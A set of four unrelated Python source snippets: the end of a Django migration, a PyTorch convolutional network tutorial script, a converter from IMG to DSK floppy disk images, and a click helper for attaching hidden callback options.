field=models.DateField(blank=True, null=True),
),
migrations.AlterField(
model_name='globalsettings',
name='key',
field=models.CharField(choices=[('dcv_permit_template_file', 'DcvPermit template file'), ('dcv_admission_template_file', 'DcvAdmission template file'), ('approval_template_file', 'Approval template file')], max_length=255),
),
]
|
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
# 1 input image channel, 6 output channels, 5x5 square convolution kernel
# Implements network described at http://pytorch.org/tutorials/_images/mnist.png
# TODO: How did they a) arrive at that architecture (arbirtrary numbers?)
# b)
self.conv1 = nn.Conv2d(1, 6, 5)
self.conv2 = nn.Conv2d(6, 16, 5)
# TODO: what does fc standfor?
self.fc1 = nn.Linear(16 * 5 * 5, 120) # an affine operation: y = Wx + b
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2)) # Max pooling over a (2, 2) window
x = F.max_pool2d(F.relu(self.conv2(x)), 2) # If the size is a square you can only specify a single number
x = x.view(-1, self.num_flat_features(x))
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
def num_flat_features(self, x):
size = x.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
net = Net()
print(net)
input = Variable(torch.randn(1, 1, 32, 32))
out = net(input)
print(out)
net.zero_grad()
out.backward(torch.randn(1, 10))
output = net(input)
target = Variable(torch.range(1, 10)) # a dummy target, for example
criterion = nn.MSELoss()
loss = criterion(output, target)
print(loss)
net.zero_grad() # zeroes the gradient buffers of all parameters
print('conv1.bias.grad before backward')
print(net.conv1.bias.grad)
loss.backward()
print('conv1.bias.grad after backward')
print(net.conv1.bias.grad)
# print(loss.creator) # MSELoss
# print(loss.creator.previous_functions[0][0]) # Linear
# print(loss.creator.previous_functions[0][0].previous_functions[0][0]) # ReLU
|
import sys, os, struct
SINGLE_SIDED_DSK_SIZE = 360*1024
DOUBLE_SIDED_DSK_SIZE = SINGLE_SIDED_DSK_SIZE * 2
"""
IMG and DSK differ only by IMG files having one byte header
in the case of single sided IMG file the header is 01
and double sided IMG has header 02.
"""
SINGLE_SIDED_IMG_SIZE = SINGLE_SIDED_DSK_SIZE + 1
DOUBLE_SIDED_IMG_SIZE = DOUBLE_SIDED_DSK_SIZE + 1
class Img2Dsk(object):
def __init__(self, input_filename, output_filename):
self.input_filename = input_filename
self.output_filename = output_filename
self.contents = None
def check_size(self):
try:
self.input_file_size = os.path.getsize(self.input_filename)
except os.error:
sys.stderr.write("Could not get the size of {}".format(
self.input_filename))
sys.exit(1)
if self.input_file_size not in (SINGLE_SIDED_IMG_SIZE,
DOUBLE_SIDED_IMG_SIZE):
sys.stderr.write("{} size is not {:d}k nor {:d}k\n".format(
self.input_filename, SINGLE_SIDED_IMG_SIZE/1024,
DOUBLE_SIDED_IMG_SIZE/1024))
sys.exit(2)
def read_input_file(self):
try:
input_file = open(self.input_filename, "rb")
except IOError:
sys.stderr.write("Could not open input_file file {}".format(
self.input_filename))
sys.exit(1)
with input_file:
self.raw_header = input_file.read(1)
self.contents = input_file.read()
def check_header(self):
if not self.raw_header:
sys.stderr.write("Could not read header\n")
sys.exit(1)
header, = struct.unpack("b", self.raw_header)
if header * SINGLE_SIDED_DSK_SIZE + 1 != self.input_file_size:
sys.stderr.write("Warning: IMG header does not match size\n")
def write_dsk(self):
try:
output_file = open(self.output_filename, "wb")
except IOError as e:
sys.stderr.write("Failed to create file {}\n{}".format(
self.output_filename, str(e)))
sys.exit(1)
with output_file:
try:
output_file.write(self.contents)
except IOError as e:
sys.stderr.write("Failed to write to file {}\n{}".format(
self.output_filename, str(e)))
sys.exit(1)
def convert(self):
self.check_size()
self.read_input_file()
self.check_header()
self.write_dsk()
if __name__ == "__main__":
if len(sys.argv) != 3:
sys.stderr.write("Usage: python img2dsk.py source_file target_file\n")
sys.stderr.write("Convert IMG file to DSK file.\n")
sys.exit(2)
converter = Img2Dsk(sys.argv[1], sys.argv[2])
converter.convert()
|
# stdlib imports
import uuid
# third-party imports
import click
class HiddenOption(click.Option):
"""Option type that suppresses any help output.
"""
hidden = True
def get_help_record(self, ctx):
return
def multioption(options, name=None, callback=None):
"""Attaches multiple options to a command function and optionally attaches a
callback to a hidden option that's fired after parsing of the embedded
options.
"""
def decorator(f):
if callback is not None:
# this option exists mainly so that it can fire the callback and
# that means we probably don't want users to invoke it on the
# command line, accidentally or otherwise. Set its CLI flag to a
# random(ish) string and hide it from the application's help output.
f = click.option(
"--{0}".format(uuid.uuid4().hex), name,
callback=callback,
cls=HiddenOption,
)(f)
# wrap the decorated function in all embedded decorators (in reverse
# order so that they execute in the correct order at runtime).
for option in reversed(options):
f = option(f)
return f
return decorator
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.